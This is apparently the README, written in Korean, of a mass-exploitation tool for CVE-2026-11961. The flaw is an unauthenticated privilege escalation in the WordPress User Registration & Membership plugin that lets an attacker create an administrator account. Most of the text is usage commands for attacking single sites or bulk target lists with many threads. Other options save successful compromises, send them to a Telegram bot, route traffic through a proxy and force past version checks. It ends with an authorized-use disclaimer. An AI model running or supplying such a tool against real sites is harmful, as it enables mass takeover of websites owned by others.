
CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 권한 상승. 잘못 구성된 멤버십 역할 → 인증되지 않은 관리자 생성 → 사이트 손상. CVSS 8.1
WordPress User Registration & Membership 플러그인에 영향을 주는 CVE-2026-11961용 대량 익스플로잇 도구.
--force)# Show help
python3 mass.py -h
# Single target
python3 mass.py -u https://target.com
# Single target with custom credentials
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"
# Multiple targets
python3 mass.py -l targets.txt -t 20
# Save successful results
python3 mass.py -l targets.txt -o results.jsonl
# Write log file
python3 mass.py -l targets.txt --log exploit.log
# Telegram notifications
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID
# Proxy
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080
# Force mode
python3 mass.py -u https://target.com --force
| Option | Description |
|---|---|
-h, --help | 도움말 메시지를 표시하고 종료 |
-u, --url | 단일 대상 URL |
-l, --list | 대상 URL이 포함된 파일 (줄당 하나) |
--username | 관리자 사용자 이름 (기본값: 무작위 생성) |
--password | 관리자 비밀번호 (기본값: 무작위 생성) |
-t, --threads | 동시 스레드 수 (기본값: 5) |
--timeout | 요청 시간 초과(초) (기본값: 15) |
-o, --output | 성공한 결과를 JSONL 파일로 저장 |
--log | 콘솔 로그를 파일로 저장 |
--proxy | HTTP/HTTPS 프록시 (예: http://127.0.0.1:8080) |
--force | 버전 검증을 건너뛰고 계속 처리 |
--tg-token | Telegram 봇 토큰 |
--tg-chat | Telegram 채팅 ID |
이 프로젝트는 공인된 보안 평가, 방어적 보안 연구, 취약점 검증만을 위해 제공됩니다.
이 소프트웨어를 사용함으로써 귀하는 대상 시스템을 평가할 명시적 승인을 받았음을 확인하게 됩니다. 컴퓨터 시스템에 대한 무단 접근은 금지되며 관련 법률을 위반할 수 있습니다.
저자와 기여자들은 이 프로젝트의 무단 사용을 권장하거나 묵인하지 않으며, 사용으로 인해 발생하는 오용, 손해 또는 법적 결과에 대해 어떠한 책임이나 의무도 지지 않습니다.
JohenLastGen JLG NETWORK